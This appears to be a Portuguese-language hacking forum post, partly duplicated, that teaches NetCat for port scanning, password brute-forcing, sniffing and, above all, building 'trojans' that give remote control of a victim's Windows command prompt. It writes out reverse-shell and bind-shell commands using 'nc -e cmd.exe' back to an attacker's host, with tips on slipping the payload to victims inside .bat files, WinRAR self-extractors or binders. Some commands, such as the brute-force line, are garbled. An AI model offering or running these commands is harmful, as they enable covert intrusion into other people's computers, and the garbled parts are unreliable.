O NetCat é considerado o canivete suíço do TCP/IP. Trata-se de uma ferramenta de linha de comando que pode ser utilizada como telnet, ping em TCP, sniffer, brute forcer, portscanner e até cavalo de troia.
O pacote NetCat já vem instalado no Linux, mas também há uma Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar.... Em ambos utilizamos o comndo nc.
Vamos ver os comandos (argumentos) principais do nc:
l = Coloca uma porta em estado de listenning (escuta)
L = Coloca uma porta em listenning(escuta), reabrindo a porta caso ela feche
P = Define uma porta
V = ativa o recebimento de eco
U = utiliza o protocolo UDP ao invés de TCP
T = para se conectar como TELNET
O = Gera um log em formato hexadecimal
W = Determina um tempo máximo para aguardar uma reposta (timeout, normalmente 30)
E = Redireciona arquivos
D = Coloca o netcat em modo furtivo, ou seja, permanece carregado em memória.
Vamos agora utilizá-lo como Port Scanner, para ver quais portas estão abertas e seus respectivos serviços:
No exemplo acima fazemos uma varredura no computador de IP NAO.SEI.SEU.IP da porta 80 até a porta 445, porta 1000 até 2000, porta 3510 e porta 4550.
Agora, vamos atacar um alvo com força bruta, isto é, testar várias senhas até chegar na senha válida:
No arquivo /home/0kal/lista.txt eu tenho uma lista de senhas de 50 MB que veio no Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar.... O ataque é registrado em /home/0kal.log.txt.
E agora, vamos vê-lo agindo como sniffer:
Neste caso, o -L é maiúsculo para reabrir sockets fechados. O nc gravará o tráfego de dados na porta 80 e gravará tudo no arquivo /home/0kal/sniffer.txt.
Lembrando que estou usando caminhos de Unix (/home/0kal). Se você está usando Windows, use caminhos de Windows (oras):
Agora, vamos criar nosso trojan de conexão reversa. Para isso, você pode colocar em simples arquivos .bat e enviar para a pessoa, Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... ou criar um arquivo SFX no WinRAR. Lembrando que se o alvo não possuir o netcat, talvez seja necessário unir o nc.exe com um binder, enviar os dois arquivos juntos zipados, usar o FileInclude do AutoIt ou optar pelo SFX.
Seja qual for sua maneira de infecção, o comando a executar:
Coloque seu IP onde está indicado. Vale à pena usar no-ip. Usaremos a porta 157, mas você pode mudar isso. Usamos -d para que o netcat rode em segundo plano. Já -e cmd.exe faz com que o prompt de comando do alvo seja controlado por você.
Antes de enviar o trojan à vítima, execute isto no seu computador:
Isto colocará o nc em modo de escuta. Como faremos conexão reversa, a vítima se conecta a voce, e não o contrário.
Ao ser executado, o prompt aparecerá logo após a linha "listening on [any] 157..." e o fim você decide.
Agora, vamos criar conexão direta. Lembrando que a conexão do modem pode impossibilitar este tipo de conexão. Para criar o trojan você pode colocar em simples arquivos .bat e enviar para a pessoa, Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... ou criar um arquivo SFX no WinRAR. Lembrando que se o alvo não possuir o netcat, talvez seja necessário unir o nc.exe com um binder, enviar os dois arquivos juntos zipados, usar o FileInclude do AutoIt ou optar pelo SFX.
Seja qual for sua maneira de infecção, o comando a executar:
Usaremos a porta 157, mas você pode mudar isso. Usamos -d para que o netcat rode em segundo plano. Já -e cmd.exe faz com que o prompt de comando do alvo seja controlado por você.
Agora, vá ao seu shell/prompt e digite:
Enjoy!
O pacote NetCat já vem instalado no Linux, mas também há uma Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar.... Em ambos utilizamos o comndo nc.
Vamos ver os comandos (argumentos) principais do nc:
l = Coloca uma porta em estado de listenning (escuta)
L = Coloca uma porta em listenning(escuta), reabrindo a porta caso ela feche
P = Define uma porta
V = ativa o recebimento de eco
U = utiliza o protocolo UDP ao invés de TCP
T = para se conectar como TELNET
O = Gera um log em formato hexadecimal
W = Determina um tempo máximo para aguardar uma reposta (timeout, normalmente 30)
E = Redireciona arquivos
D = Coloca o netcat em modo furtivo, ou seja, permanece carregado em memória.
Vamos agora utilizá-lo como Port Scanner, para ver quais portas estão abertas e seus respectivos serviços:
Código:
nc -vv NAO.SEI.SEU.IP 80-445 1000-2000 3510 4550
Agora, vamos atacar um alvo com força bruta, isto é, testar várias senhas até chegar na senha válida:
Código:
nc 80 /home/0kal/lista.txt /home/0kal/log.txt
E agora, vamos vê-lo agindo como sniffer:
Código:
nc -vv -L 127.0.0.1 -p 80>/home/0kal/sniffer.txt
Lembrando que estou usando caminhos de Unix (/home/0kal). Se você está usando Windows, use caminhos de Windows (oras):
Código:
%HOMEDRIVE%%HOMEPATH%
Seja qual for sua maneira de infecção, o comando a executar:
Código:
nc -d SEU.IP.BEM.AQ 157 -e cmd.exe
Antes de enviar o trojan à vítima, execute isto no seu computador:
Código:
nc -L -n -p 157 -vv
Ao ser executado, o prompt aparecerá logo após a linha "listening on [any] 157..." e o fim você decide.
Agora, vamos criar conexão direta. Lembrando que a conexão do modem pode impossibilitar este tipo de conexão. Para criar o trojan você pode colocar em simples arquivos .bat e enviar para a pessoa, Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... ou criar um arquivo SFX no WinRAR. Lembrando que se o alvo não possuir o netcat, talvez seja necessário unir o nc.exe com um binder, enviar os dois arquivos juntos zipados, usar o FileInclude do AutoIt ou optar pelo SFX.
Seja qual for sua maneira de infecção, o comando a executar:
Código:
nc -L -p 157 -vv -e cmd.exe
Agora, vá ao seu shell/prompt e digite:
Código:
nc IP.DA.VIT.MA 157
Comment